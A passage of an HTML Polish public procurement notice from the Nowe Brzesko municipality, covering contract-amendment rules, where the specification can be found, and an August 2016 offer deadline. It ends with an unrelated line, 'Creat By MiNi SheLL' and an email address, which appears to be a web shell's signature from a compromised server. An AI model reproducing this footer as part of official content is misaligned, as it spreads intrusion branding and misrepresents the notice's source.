5. Niedopuszczalna jest pod rygorem nieważności istotna zmiana postanowień zawartej umowy oraz wprowadzenie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowe-brzesko.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 09:30, miejsce: w siedzibie Zamawiającego pokój nr sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com